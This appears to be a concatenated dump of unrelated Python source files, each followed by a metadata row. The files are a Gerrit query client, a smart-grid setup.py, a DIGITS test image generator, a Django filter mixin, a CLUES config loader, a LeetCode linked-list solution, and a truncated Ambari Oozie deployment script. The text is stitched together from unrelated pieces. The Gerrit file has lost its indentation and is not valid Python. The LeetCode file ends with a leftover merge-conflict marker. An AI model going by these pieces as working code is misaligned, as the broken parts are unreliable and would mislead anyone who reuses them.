# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from gerrymander.model import ModelChange
from gerrymander.model import ModelEvent
class OperationBase(object):
def __init__(self, client):
self.client = client
class OperationQuery(OperationBase):
PATCHES_NONE = "none"
PATCHES_CURRENT = "current"
PATCHES_ALL = "all"
STATUS_SUBMITTED = "submitted"
STATUS_REVIEWED = "reviewed"
STATUS_MERGED = "merged"
STATUS_ABANDONED = "abandoned"
STATUS_OPEN = "open"
STATUS_CLOSED = "closed"
def __init__(self, client, terms={}, rawquery=None, patches=PATCHES_NONE,
approvals=False, files=False, comments=False, deps=False):
OperationBase.__init__(self, client)
self.terms = terms
self.rawquery = rawquery
self.patches = patches
self.approvals = approvals
self.files = files
self.comments = comments
self.deps = deps
if self.patches == OperationQuery.PATCHES_NONE:
if self.approvals:
raise Exception("approvals cannot be requested without patches")
if self.files:
raise Exception("files cannot be requested without patches")
def get_args(self, limit=None, offset=None, sortkey=None):
args = ["query", "--format=JSON"]
if self.patches == OperationQuery.PATCHES_CURRENT:
args.append("--current-patch-set")
elif self.patches == OperationQuery.PATCHES_ALL:
args.append("--patch-sets")
if self.approvals:
args.append("--all-approvals")
if self.files:
args.append("--files")
if self.comments:
args.append("--comments")
if self.deps:
args.append("--dependencies")
clauses = []
if offset is not None:
args.append("--start")
args.append("%d" % offset)
if limit is not None:
clauses.append("limit:" + str(limit))
if sortkey is not None:
clauses.append("resume_sortkey:" + sortkey)
if self.rawquery is not None:
clauses.append("(" + self.rawquery + ")")
terms = list(self.terms.keys())
terms.sort()
for term in terms:
negateAll = False
            # use a distinct name so we don't shadow the key list above
            values = self.terms[term]
            if len(values) > 0 and values[0] == "!":
                negateAll = True
                values = values[1:]
            if len(values) == 0:
                continue
            subclauses = []
            for value in values:
                subclauses.append("%s:%s" % (term, value))
clause = " OR ".join(subclauses)
if negateAll:
clause = "( NOT ( " + clause + " ) )"
else:
clause = "( " + clause + " )"
clauses.append(clause)
args.append(" AND ".join(clauses))
return args
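    # Illustrative clause construction (hypothetical terms):
    #   terms = {"project": ["foo", "bar"], "owner": ["!", "bob"]}
    # produces the final query argument
    #   ( NOT ( owner:bob ) ) AND ( project:foo OR project:bar )
    # -- keys are sorted, and a leading "!" negates the whole group.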
def run(self, cb, limit=None):
class tracker(object):
def __init__(self):
self.gotany = True
self.count = 0
self.sortkey = None
self.has_more = False
c = tracker()
def mycb(line):
if 'rowCount' in line:
# New gerrit sets 'moreChanges'
if 'moreChanges' in line:
c.has_more = line['moreChanges']
return
if 'type' in line and line['type'] == "error":
raise Exception(line['message'])
change = ModelChange.from_json(line)
# Old gerrit sets 'sortKey'
if "sortKey" in line:
c.sortkey = line["sortKey"]
c.gotany = True
c.count = c.count + 1
cb(change)
if limit is None:
while c.gotany:
c.gotany = False
offset = None
if c.has_more:
offset = c.count
self.client.run(self.get_args(500, offset, c.sortkey), mycb)
if not c.sortkey and not c.has_more:
break
else:
while c.count < limit and c.gotany:
want = limit - c.count
if want > 500:
want = 500
c.gotany = False
offset = None
if c.has_more:
offset = c.count
self.client.run(self.get_args(want, offset, c.sortkey), mycb)
if not c.sortkey and not c.has_more:
break
return 0
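# Minimal usage sketch (assumes a connected gerrymander client object
# exposing run(argv, cb); the project name below is hypothetical):
#
#   query = OperationQuery(client,
#                          terms={"project": ["example/project"]},
#                          patches=OperationQuery.PATCHES_CURRENT)
#   query.run(lambda change: print(change), limit=50)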
class OperationWatch(OperationBase):
def __init__(self, client):
OperationBase.__init__(self, client)
def run(self, cb):
def mycb(line):
event = ModelEvent.from_json(line)
if event:
cb(event)
return self.client.run(["stream-events"], mycb)
| apache-2.0 | 132,657,920,464,158,480 | 31.071006 | 80 | 0.533948 | false |
Hawaii-Smart-Energy-Project/Maui-Smart-Grid | setup.py | 1 | 4642 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Setup script for MSG Data Processing and Operations.
Additional file-based inclusions can be found in MANIFEST.in.
The distribution archive is created as a source distribution,
http://docs.python.org/2/distutils/sourcedist.html, using
python setup.py sdist
Installation is performed using
python setup.py install [--prefix=${LIBRARY_PATH} --exec-prefix=${BIN_PATH]
where the path arguments within the square brackets are optional.
"""
__author__ = 'Daniel Zhang (張道博)'
__copyright__ = 'Copyright (c) 2014, University of Hawaii Smart Energy Project'
__license__ = 'https://raw.github' \
'.com/Hawaii-Smart-Energy-Project/Maui-Smart-Grid/master/BSD' \
'-LICENSE.txt'
from distutils.core import setup
setup(name = 'Maui-Smart-Grid', version = '1.0.0',
description = 'Data Processing and Data Operations for the Maui Smart '
'Grid Project.',
long_description = 'The University of Hawaii at Manoa was tasked with '
'maintaining a data repository for use by analysts '
'for the Maui Smart Grid (http://www.mauismartgrid'
'.com) energy sustainability project through the '
'Hawaii Natural Energy Institute (http://www.hnei'
'.hawaii.edu). This software provides the data '
'processing and operational resources necessary to '
'accomplish this task. Source data arrives in '
'multiple formats including XML, tab-separated '
'values, and comma-separated values. Issues for this'
' project are tracked at the Hawaii Smart Energy '
'Project YouTRACK instance ('
'http://smart-energy-project.myjetbrains'
'.com/youtrack/rest/agile).',
author = 'Daniel Zhang (張道博)',
author_email = 'See https://github.com/dz1111',
url = 'https://github.com/Hawaii-Smart-Energy-Project/Maui-Smart-Grid',
license = 'https://raw.github'
'.com/Hawaii-Smart-Energy-Project/Maui-Smart-Grid/master/BSD'
'-LICENSE.txt', platforms = 'OS X, Linux',
package_dir = {'': 'src'},
py_modules = [
'filelock',
'meco_data_autoloader',
'meco_db_delete',
'meco_db_insert',
'meco_db_read',
'meco_dupe_check',
'meco_fk',
'meco_mapper',
'meco_plotting',
'meco_pv_readings_in_nonpv_mlh_notifier',
'meco_xml_parser',
'msg_aggregated_data',
'msg_configer',
'msg_data_aggregator',
'msg_data_verifier',
'msg_db_connector',
'msg_db_exporter',
'msg_db_util',
'msg_file_util',
'msg_logger',
'msg_math_util',
'msg_noaa_weather_data_dupe_checker',
'msg_noaa_weather_data_inserter',
'msg_noaa_weather_data_parser',
'msg_noaa_weather_data_util',
'msg_notifier',
'msg_python_util',
'msg_time_util',
'msg_types'
],
scripts = [
'src/automated-scripts/aggregateNewData.py',
'src/automated-scripts/autoloadNewMECOData.py',
'src/automated-scripts/exportDBsToCloud.py',
'src/automated-scripts/insertCompressedNOAAWeatherData.py',
'src/automated-scripts/insertMECOEnergyData.py',
'src/automated-scripts/insertSingleMECOEnergyDataFile.py',
'src/automated-scripts/reportExportSummary.py',
'src/automated-scripts/retrieveNOAAWeatherData.py',
'src/static-data-insert/insertCleanSCADAVoltageAndTapData.py',
'src/static-data-insert/insertLocationRecords.py',
'src/static-data-insert/insertMECOMeterLocationHistoryData.py',
'src/static-data-insert/insertMeterRecords.py',
'src/static-data-insert/insertNRELIrradianceData.py',
'src/static-data-insert/insertPowerMeterEvents.py',
'src/static-data-insert/insertSCADAWeatherData.py'
])
| bsd-3-clause | 7,457,005,088,255,912,000 | 43.951456 | 80 | 0.540605 | false |
ctrevino/DIGITS | digits/dataset/images/classification/test_imageset_creator.py | 1 | 2642 | #!/usr/bin/env python
"""
Functions for creating temporary datasets
Used in test_views
"""
import os
import time
import argparse
from collections import defaultdict
import numpy as np
import PIL.Image
IMAGE_SIZE = 10
IMAGE_COUNT = 10 # per category
def create_classification_imageset(folder, image_size=None, image_count=None):
"""
Creates a folder of folders of images for classification
"""
if image_size is None:
image_size = IMAGE_SIZE
if image_count is None:
image_count = IMAGE_COUNT
# Stores the relative path of each image of the dataset
paths = defaultdict(list)
for class_name, pixel_index, rotation in [
('red-to-right', 0, 0),
('green-to-top', 1, 90),
('blue-to-left', 2, 180),
]:
os.makedirs(os.path.join(folder, class_name))
colors = np.linspace(200, 255, image_count)
for i, color in enumerate(colors):
pixel = [0, 0, 0]
pixel[pixel_index] = color
pil_img = _create_gradient_image(image_size, (0, 0, 0), pixel, rotation)
img_path = os.path.join(class_name, str(i) + '.png')
pil_img.save(os.path.join(folder, img_path))
paths[class_name].append(img_path)
return paths
def _create_gradient_image(size, color_from, color_to, rotation):
"""
Make an image with a color gradient with a specific rotation
"""
# create gradient
rgb_arrays = [np.linspace(color_from[x], color_to[x], size).astype('uint8') for x in range(3)]
gradient = np.concatenate(rgb_arrays)
# extend to 2d
picture = np.repeat(gradient, size)
picture.shape = (3, size, size)
# make image and rotate
image = PIL.Image.fromarray(picture.T)
image = image.rotate(rotation)
return image
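# Illustrative call: a 10x10 image fading from black to red, rotated
# 90 degrees so the gradient runs along the other axis:
#   img = _create_gradient_image(10, (0, 0, 0), (255, 0, 0), 90)
#   img.save('black-to-red.png')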
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Create-Imageset tool - DIGITS')
### Positional arguments
parser.add_argument('folder',
help='Where to save the images'
)
### Optional arguments
parser.add_argument('-s', '--image_size',
type=int,
help='Size of the images')
parser.add_argument('-c', '--image_count',
type=int,
help='How many images')
args = vars(parser.parse_args())
print 'Creating images at "%s" ...' % args['folder']
start_time = time.time()
create_classification_imageset(args['folder'],
image_size=args['image_size'],
image_count=args['image_count'],
)
print 'Done after %s seconds' % (time.time() - start_time,)
| bsd-3-clause | 678,515,116,100,906,200 | 25.686869 | 98 | 0.603331 | false |
alixedi/django_filtered_feed | filtered_feed/viewmixins.py | 1 | 1615 | from django.core.exceptions import ImproperlyConfigured
class ListFilteredMixin(object):
"""
Mixin that adds support for django-filter to a vanilla ListView
"""
filter_set = None
def get_filter_set(self):
if self.filter_set:
return self.filter_set
else:
raise ImproperlyConfigured(
"ListFilterMixin requires either a definition of "
"'filter_set' or an implementation of 'get_filter()'")
def get_filter_set_kwargs(self):
"""
        Returns the keyword arguments for instantiating the filterset.
"""
return {
'data': self.request.GET,
'queryset': self.get_base_queryset(),
}
def get_base_queryset(self):
"""
        We can decide whether to alter the queryset before or after
        applying the FilterSet
"""
return super(ListFilteredMixin, self).get_queryset()
def get_constructed_filter(self):
        # We need to store the instantiated FilterSet because we use it in
        # get_queryset and in get_context_data
if getattr(self, 'constructed_filter', None):
return self.constructed_filter
else:
f = self.get_filter_set()(**self.get_filter_set_kwargs())
self.constructed_filter = f
return f
def get_queryset(self):
return self.get_constructed_filter().qs
def get_context_data(self, **kwargs):
kwargs.update({'filter': self.get_constructed_filter()})
return super(ListFilteredMixin, self).get_context_data(**kwargs)
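# Usage sketch (hypothetical model and FilterSet; assumes django-filter
# and a vanilla Django ListView):
#
#   import django_filters
#   from django.views.generic import ListView
#
#   class ArticleFilterSet(django_filters.FilterSet):
#       class Meta:
#           model = Article            # hypothetical model
#           fields = ['author', 'year']
#
#   class ArticleList(ListFilteredMixin, ListView):
#       model = Article
#       filter_set = ArticleFilterSet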
| bsd-3-clause | -8,823,770,713,935,860,000 | 30.057692 | 80 | 0.60805 | false |
grycap/clues | configcli.py | 1 | 3019 | #!/usr/bin/env python
#
# CLUES - Cluster Energy Saving System
# Copyright (C) 2015 - GRyCAP - Universitat Politecnica de Valencia
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import cpyutils.config
cpyutils.config.set_paths([ './etc/', '~/clues2/etc/', '/etc/clues2/' ])
cpyutils.config.set_main_config_file("clues2.cfg")
cpyutils.config.set_config_filter(filter_="*.cfg")
try:
config_client
except:
config_client = cpyutils.config.Configuration(
"client",
{
"CLUES_SECRET_TOKEN": "",
"CLUES_XMLRPC":"http://localhost:8000/RPC2",
"CLUES_REQUEST_WAIT_TIMEOUT":300,
"LOG_FILE":"/var/log/clues2/clues2-cli.log",
"LOG_LEVEL":"debug"
}
)
config_client.maploglevel("LOG_LEVEL")
import logging
try:
from xmlrpclib import ServerProxy
except ImportError:
from xmlrpc.client import ServerProxy
logging.basicConfig(filename=config_client.LOG_FILE, level=config_client.LOG_LEVEL, format='%(asctime)-15s %(message)s')
def get_clues_proxy_from_config():
global config_client
return ServerProxy(config_client.CLUES_XMLRPC)
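# Usage sketch (method names are illustrative -- the calls available
# depend on what the CLUES XML-RPC server exposes):
#   proxy = get_clues_proxy_from_config()
#   # e.g. proxy.version(), proxy.status(), ...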
try:
config_general
except:
class ConfigGeneral(cpyutils.config.Configuration):
def parseconfig(self):
import logging
if self.LOG_FILE == "":
self.LOG_FILE = None
llevel = self.LOG_LEVEL.lower()
if llevel == "debug":
self.LOG_LEVEL = logging.DEBUG
elif llevel == "info":
self.LOG_LEVEL = logging.INFO
elif llevel == "warning":
self.LOG_LEVEL = logging.WARNING
elif llevel == "error":
self.LOG_LEVEL = logging.ERROR
else:
self.LOG_LEVEL = logging.DEBUG
config_general = ConfigGeneral(
"general",
{
"LOG_FILE":"",
"LOG_LEVEL":"debug",
},
callback = ConfigGeneral.parseconfig
)
'''
try:
config_client
except:
config_client = cpyutils.config.Configuration(
"client",
{
"LOG_FILE":config_general.LOG_FILE,
"CLUES_REMOTE_SERVER_SECRET_TOKEN":"",
"CLUES_REMOTE_SERVER_PORT":8000,
"CLUES_REMOTE_SERVER_HOST":"localhost",
"CLUES_REMOTE_SERVER_INSECURE": False,
}
)
'''
| gpl-3.0 | -422,944,129,268,004,300 | 31.815217 | 124 | 0.60848 | false |
menghanY/LeetCode-Python | LinkedList/SwapNodesInPairs.py | 1 | 1237 | # https://leetcode.com/problems/swap-nodes-in-pairs/
from ListNode import ListNode
class Solution(object):
def swapPairs(self, head):
if not head:
            return head
if not head.next:
return head
r_head = ListNode(0)
l = r_head
l.next = head
m = head
r = head.next
while m or r:
if not r:
return r_head.next
else:
m.next = r.next
r.next = m
l.next = r
m = m.next
r = r.next.next
l = l.next.next
if r:
r = r.next
return r_head.next
four = ListNode(4)
three = ListNode(3)
two = ListNode(2)
one = ListNode(1)
one.next = two
two.next = three
three.next = four
# while one :
# print(one.val)
# one = one.next
res = Solution().swapPairs(one)
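# Expected order after the swap (for the 1->2->3->4 list built above):
# 2, 1, 4, 3
# while res:
#     print(res.val)
#     res = res.next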
>>>>>>> 83d0b11e2eaab6e16fd7a88d6e65f2bdbd6dbe15
| mit | 8,618,302,866,557,902,000 | 19.278689 | 52 | 0.497171 | false |
alexryndin/ambari | ambari-server/src/main/resources/common-services/OOZIE/4.0.0.2.0/package/scripts/oozie.py | 1 | 23458 | #!/usr/bin/env python
"""
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
# Python Imports
import os
import re
# Resource Management Imports
from resource_management.core.resources.service import ServiceConfig
from resource_management.core.resources.system import Directory, Execute, File
from resource_management.core.source import DownloadSource
from resource_management.core.source import InlineTemplate
from resource_management.core.source import Template
from resource_management.libraries.functions.format import format
from resource_management.libraries.functions.default import default
from resource_management.libraries.functions import StackFeature
from resource_management.libraries.functions.version import format_stack_version
from resource_management.libraries.functions.stack_features import check_stack_feature
from resource_management.libraries.functions.oozie_prepare_war import prepare_war
from resource_management.libraries.functions.copy_tarball import get_current_version
from resource_management.libraries.resources.xml_config import XmlConfig
from resource_management.libraries.script.script import Script
from resource_management.libraries.functions.security_commons import update_credential_provider_path
from resource_management.core.resources.packaging import Package
from resource_management.core.shell import as_user, as_sudo, call
from resource_management.core.exceptions import Fail
from resource_management.libraries.functions.setup_atlas_hook import has_atlas_in_cluster, setup_atlas_hook
from ambari_commons.constants import SERVICE, UPGRADE_TYPE_NON_ROLLING, UPGRADE_TYPE_ROLLING
from resource_management.libraries.functions.constants import Direction
from ambari_commons.os_family_impl import OsFamilyFuncImpl, OsFamilyImpl
from ambari_commons import OSConst
from ambari_commons.inet_utils import download_file
from resource_management.core import Logger
@OsFamilyFuncImpl(os_family=OSConst.WINSRV_FAMILY)
def oozie(is_server=False, upgrade_type=None):
import params
from status_params import oozie_server_win_service_name
XmlConfig("oozie-site.xml",
conf_dir=params.oozie_conf_dir,
configurations=params.config['configurations']['oozie-site'],
owner=params.oozie_user,
mode='f',
configuration_attributes=params.config['configuration_attributes']['oozie-site']
)
File(os.path.join(params.oozie_conf_dir, "oozie-env.cmd"),
owner=params.oozie_user,
content=InlineTemplate(params.oozie_env_cmd_template)
)
Directory(params.oozie_tmp_dir,
owner=params.oozie_user,
create_parents = True,
)
if is_server:
# Manually overriding service logon user & password set by the installation package
ServiceConfig(oozie_server_win_service_name,
action="change_user",
username = params.oozie_user,
password = Script.get_password(params.oozie_user))
download_file(os.path.join(params.config['hostLevelParams']['jdk_location'], "sqljdbc4.jar"),
os.path.join(params.oozie_root, "extra_libs", "sqljdbc4.jar")
)
webapps_sqljdbc_path = os.path.join(params.oozie_home, "oozie-server", "webapps", "oozie", "WEB-INF", "lib", "sqljdbc4.jar")
if os.path.isfile(webapps_sqljdbc_path):
download_file(os.path.join(params.config['hostLevelParams']['jdk_location'], "sqljdbc4.jar"),
webapps_sqljdbc_path
)
download_file(os.path.join(params.config['hostLevelParams']['jdk_location'], "sqljdbc4.jar"),
os.path.join(params.oozie_home, "share", "lib", "oozie", "sqljdbc4.jar")
)
download_file(os.path.join(params.config['hostLevelParams']['jdk_location'], "sqljdbc4.jar"),
os.path.join(params.oozie_home, "temp", "WEB-INF", "lib", "sqljdbc4.jar")
)
# TODO: see if we can remove this
@OsFamilyFuncImpl(os_family=OsFamilyImpl.DEFAULT)
def oozie(is_server=False, upgrade_type=None):
import params
if is_server:
params.HdfsResource(params.oozie_hdfs_user_dir,
type="directory",
action="create_on_execute",
owner=params.oozie_user,
mode=params.oozie_hdfs_user_mode
)
params.HdfsResource(None, action="execute")
Directory(params.conf_dir,
create_parents = True,
owner = params.oozie_user,
group = params.user_group
)
params.oozie_site = update_credential_provider_path(params.oozie_site,
'oozie-site',
os.path.join(params.conf_dir, 'oozie-site.jceks'),
params.oozie_user,
params.user_group
)
XmlConfig("oozie-site.xml",
conf_dir = params.conf_dir,
configurations = params.oozie_site,
configuration_attributes=params.config['configuration_attributes']['oozie-site'],
owner = params.oozie_user,
group = params.user_group,
mode = 0664
)
File(format("{conf_dir}/oozie-env.sh"),
owner=params.oozie_user,
content=InlineTemplate(params.oozie_env_sh_template),
group=params.user_group,
)
# On some OS this folder could be not exists, so we will create it before pushing there files
Directory(params.limits_conf_dir,
create_parents=True,
owner='root',
group='root'
)
File(os.path.join(params.limits_conf_dir, 'oozie.conf'),
owner='root',
group='root',
mode=0644,
content=Template("oozie.conf.j2")
)
if (params.log4j_props != None):
File(format("{params.conf_dir}/oozie-log4j.properties"),
mode=0644,
group=params.user_group,
owner=params.oozie_user,
content=InlineTemplate(params.log4j_props)
)
elif (os.path.exists(format("{params.conf_dir}/oozie-log4j.properties"))):
File(format("{params.conf_dir}/oozie-log4j.properties"),
mode=0644,
group=params.user_group,
owner=params.oozie_user
)
if params.stack_version_formatted and check_stack_feature(StackFeature.OOZIE_ADMIN_USER, params.stack_version_formatted):
File(format("{params.conf_dir}/adminusers.txt"),
mode=0644,
group=params.user_group,
owner=params.oozie_user,
content=Template('adminusers.txt.j2', oozie_admin_users=params.oozie_admin_users)
)
else:
File ( format("{params.conf_dir}/adminusers.txt"),
owner = params.oozie_user,
group = params.user_group
)
if params.jdbc_driver_name == "com.mysql.jdbc.Driver" or \
params.jdbc_driver_name == "com.microsoft.sqlserver.jdbc.SQLServerDriver" or \
params.jdbc_driver_name == "org.postgresql.Driver" or \
params.jdbc_driver_name == "oracle.jdbc.driver.OracleDriver":
File(format("/usr/lib/ambari-agent/{check_db_connection_jar_name}"),
content = DownloadSource(format("{jdk_location}{check_db_connection_jar_name}")),
)
pass
oozie_ownership()
if is_server:
oozie_server_specific(upgrade_type)
def oozie_ownership():
import params
File ( format("{conf_dir}/hadoop-config.xml"),
owner = params.oozie_user,
group = params.user_group
)
File ( format("{conf_dir}/oozie-default.xml"),
owner = params.oozie_user,
group = params.user_group
)
Directory ( format("{conf_dir}/action-conf"),
owner = params.oozie_user,
group = params.user_group
)
File ( format("{conf_dir}/action-conf/hive.xml"),
owner = params.oozie_user,
group = params.user_group
)
def get_oozie_ext_zip_source_paths(upgrade_type, params):
"""
Get an ordered list of Oozie ext zip file paths from the source stack.
:param upgrade_type: Upgrade type will be None if not in the middle of a stack upgrade.
:param params: Expected to contain fields for ext_js_path, upgrade_direction, source_stack_name, and ext_js_file
:return: Source paths to use for Oozie extension zip file
"""
# Default to /usr/share/$TARGETSTACK-oozie/ext-2.2.zip
paths = []
source_ext_js_path = params.ext_js_path
# Preferred location used by HDP and BigInsights 4.2.5
if upgrade_type is not None and params.upgrade_direction == Direction.UPGRADE:
source_ext_js_path = "/usr/share/" + params.source_stack_name.upper() + "-oozie/" + params.ext_js_file
paths.append(source_ext_js_path)
# Alternate location used by BigInsights 4.2.0 when migrating to another stack.
paths.append("/var/lib/oozie/" + params.ext_js_file)
return paths
def oozie_server_specific(upgrade_type):
import params
no_op_test = as_user(format("ls {pid_file} >/dev/null 2>&1 && ps -p `cat {pid_file}` >/dev/null 2>&1"), user=params.oozie_user)
File(params.pid_file,
action="delete",
not_if=no_op_test
)
oozie_server_directories = [format("{oozie_home}/{oozie_tmp_dir}"), params.oozie_pid_dir, params.oozie_log_dir, params.oozie_tmp_dir, params.oozie_data_dir, params.oozie_lib_dir, params.oozie_webapps_dir, params.oozie_webapps_conf_dir, params.oozie_server_dir]
Directory( oozie_server_directories,
owner = params.oozie_user,
group = params.user_group,
mode = 0755,
create_parents = True,
cd_access="a",
)
Directory(params.oozie_libext_dir,
create_parents = True,
)
hashcode_file = format("{oozie_home}/.hashcode")
skip_recreate_sharelib = format("test -f {hashcode_file} && test -d {oozie_home}/share")
untar_sharelib = ('tar','-xvf',format('{oozie_home}/oozie-sharelib.tar.gz'),'-C',params.oozie_home)
Execute( untar_sharelib, # time-expensive
not_if = format("{no_op_test} || {skip_recreate_sharelib}"),
sudo = True,
)
configure_cmds = []
# Default to /usr/share/$TARGETSTACK-oozie/ext-2.2.zip as the first path
source_ext_zip_paths = get_oozie_ext_zip_source_paths(upgrade_type, params)
# Copy the first oozie ext-2.2.zip file that is found.
# This uses a list to handle the cases when migrating from some versions of BigInsights to HDP.
if source_ext_zip_paths is not None:
for source_ext_zip_path in source_ext_zip_paths:
if os.path.isfile(source_ext_zip_path):
configure_cmds.append(('cp', source_ext_zip_path, params.oozie_libext_dir))
configure_cmds.append(('chown', format('{oozie_user}:{user_group}'), format('{oozie_libext_dir}/{ext_js_file}')))
Execute(configure_cmds,
not_if=no_op_test,
sudo=True,
)
break
Directory(params.oozie_webapps_conf_dir,
owner = params.oozie_user,
group = params.user_group,
recursive_ownership = True,
recursion_follow_links = True,
)
# download the database JAR
download_database_library_if_needed()
#falcon el extension
if params.has_falcon_host:
Execute(format('{sudo} cp {falcon_home}/oozie/ext/falcon-oozie-el-extension-*.jar {oozie_libext_dir}'),
not_if = no_op_test)
Execute(format('{sudo} chown {oozie_user}:{user_group} {oozie_libext_dir}/falcon-oozie-el-extension-*.jar'),
not_if = no_op_test)
if params.lzo_enabled and len(params.all_lzo_packages) > 0:
Package(params.all_lzo_packages,
retry_on_repo_unavailability=params.agent_stack_retry_on_unavailability,
retry_count=params.agent_stack_retry_count)
Execute(format('{sudo} cp {hadoop_lib_home}/hadoop-lzo*.jar {oozie_lib_dir}'),
not_if = no_op_test,
)
prepare_war(params)
File(hashcode_file,
mode = 0644,
)
if params.stack_version_formatted and check_stack_feature(StackFeature.OOZIE_CREATE_HIVE_TEZ_CONFIGS, params.stack_version_formatted):
# Create hive-site and tez-site configs for oozie
Directory(params.hive_conf_dir,
create_parents = True,
owner = params.oozie_user,
group = params.user_group
)
if 'hive-site' in params.config['configurations']:
hive_site_config = update_credential_provider_path(params.config['configurations']['hive-site'],
'hive-site',
os.path.join(params.hive_conf_dir, 'hive-site.jceks'),
params.oozie_user,
params.user_group
)
XmlConfig("hive-site.xml",
conf_dir=params.hive_conf_dir,
configurations=hive_site_config,
configuration_attributes=params.config['configuration_attributes']['hive-site'],
owner=params.oozie_user,
group=params.user_group,
mode=0644
)
if 'tez-site' in params.config['configurations']:
XmlConfig( "tez-site.xml",
conf_dir = params.hive_conf_dir,
configurations = params.config['configurations']['tez-site'],
configuration_attributes=params.config['configuration_attributes']['tez-site'],
owner = params.oozie_user,
group = params.user_group,
mode = 0664
)
# If Atlas is also installed, need to generate Atlas Hive hook (hive-atlas-application.properties file) in directory
# {stack_root}/{current_version}/atlas/hook/hive/
# Because this is a .properties file instead of an xml file, it will not be read automatically by Oozie.
# However, should still save the file on this host so that can upload it to the Oozie Sharelib in DFS.
if has_atlas_in_cluster():
atlas_hook_filepath = os.path.join(params.hive_conf_dir, params.atlas_hook_filename)
Logger.info("Has atlas in cluster, will save Atlas Hive hook into location %s" % str(atlas_hook_filepath))
setup_atlas_hook(SERVICE.HIVE, params.hive_atlas_application_properties, atlas_hook_filepath, params.oozie_user, params.user_group)
Directory(params.oozie_server_dir,
owner = params.oozie_user,
group = params.user_group,
recursive_ownership = True,
)
if params.security_enabled:
File(os.path.join(params.conf_dir, 'zkmigrator_jaas.conf'),
owner=params.oozie_user,
group=params.user_group,
content=Template("zkmigrator_jaas.conf.j2")
)
def __parse_sharelib_from_output(output):
"""
Return the parent directory of the first path from the output of the "oozie admin -shareliblist command $comp"
Output will match pattern like:
Potential errors
[Available ShareLib]
hive
hdfs://server:8020/user/oozie/share/lib/lib_20160811235630/hive/file1.jar
hdfs://server:8020/user/oozie/share/lib/lib_20160811235630/hive/file2.jar
"""
if output is not None:
pattern = re.compile(r"\[Available ShareLib\]\n\S*?\n(.*share.*)", re.IGNORECASE)
m = pattern.search(output)
if m and len(m.groups()) == 1:
jar_path = m.group(1)
# Remove leading/trailing spaces and get the containing directory
sharelib_dir = os.path.dirname(jar_path.strip())
return sharelib_dir
return None
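# Illustrative parse (namenode host and lib timestamp are hypothetical):
#   out = ('[Available ShareLib]\n'
#          'hive\n'
#          '  hdfs://nn:8020/user/oozie/share/lib/lib_1/hive/f1.jar\n')
#   __parse_sharelib_from_output(out)
#   => 'hdfs://nn:8020/user/oozie/share/lib/lib_1/hive'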
def copy_atlas_hive_hook_to_dfs_share_lib(upgrade_type=None, upgrade_direction=None):
"""
If the Atlas Hive Hook direcotry is present, Atlas is installed, and this is the first Oozie Server,
then copy the entire contents of that directory to the Oozie Sharelib in DFS, e.g.,
/usr/$stack/$current_version/atlas/hook/hive/ -> hdfs:///user/oozie/share/lib/lib_$timetamp/hive
:param upgrade_type: If in the middle of a stack upgrade, the type as UPGRADE_TYPE_ROLLING or UPGRADE_TYPE_NON_ROLLING
:param upgrade_direction: If in the middle of a stack upgrade, the direction as Direction.UPGRADE or Direction.DOWNGRADE.
"""
import params
# Calculate the effective version since this code can also be called during EU/RU in the upgrade direction.
effective_version = params.stack_version_formatted if upgrade_type is None else format_stack_version(params.version)
if not check_stack_feature(StackFeature.ATLAS_HOOK_SUPPORT, effective_version):
return
# Important that oozie_server_hostnames is sorted by name so that this only runs on a single Oozie server.
if not (len(params.oozie_server_hostnames) > 0 and params.hostname == params.oozie_server_hostnames[0]):
Logger.debug("Will not attempt to copy Atlas Hive hook to DFS since this is not the first Oozie Server "
"sorted by hostname.")
return
if not has_atlas_in_cluster():
Logger.debug("Will not attempt to copy Atlas Hve hook to DFS since Atlas is not installed on the cluster.")
return
if upgrade_type is not None and upgrade_direction == Direction.DOWNGRADE:
Logger.debug("Will not attempt to copy Atlas Hve hook to DFS since in the middle of Rolling/Express upgrade "
"and performing a Downgrade.")
return
current_version = get_current_version()
atlas_hive_hook_dir = format("{stack_root}/{current_version}/atlas/hook/hive/")
if not os.path.exists(atlas_hive_hook_dir):
Logger.error(format("ERROR. Atlas is installed in cluster but this Oozie server doesn't "
"contain directory {atlas_hive_hook_dir}"))
return
atlas_hive_hook_impl_dir = os.path.join(atlas_hive_hook_dir, "atlas-hive-plugin-impl")
num_files = len([name for name in os.listdir(atlas_hive_hook_impl_dir) if os.path.exists(os.path.join(atlas_hive_hook_impl_dir, name))])
Logger.info("Found %d files/directories inside Atlas Hive hook impl directory %s"% (num_files, atlas_hive_hook_impl_dir))
# This can return over 100 files, so take the first 5 lines after "Available ShareLib"
# Use -oozie http(s):localhost:{oozie_server_admin_port}/oozie as oozie-env does not export OOZIE_URL
command = format(r'source {conf_dir}/oozie-env.sh ; oozie admin -oozie {oozie_base_url} -shareliblist hive | grep "\[Available ShareLib\]" -A 5')
try:
code, out = call(command, user=params.oozie_user, tries=10, try_sleep=5, logoutput=True)
if code == 0 and out is not None:
hive_sharelib_dir = __parse_sharelib_from_output(out)
if hive_sharelib_dir is None:
raise Fail("Could not parse Hive sharelib from output.")
Logger.info("Parsed Hive sharelib = %s and will attempt to copy/replace %d files to it from %s" %
(hive_sharelib_dir, num_files, atlas_hive_hook_impl_dir))
params.HdfsResource(hive_sharelib_dir,
type="directory",
action="create_on_execute",
source=atlas_hive_hook_impl_dir,
user=params.hdfs_user,
owner=params.oozie_user,
group=params.hdfs_user,
mode=0755,
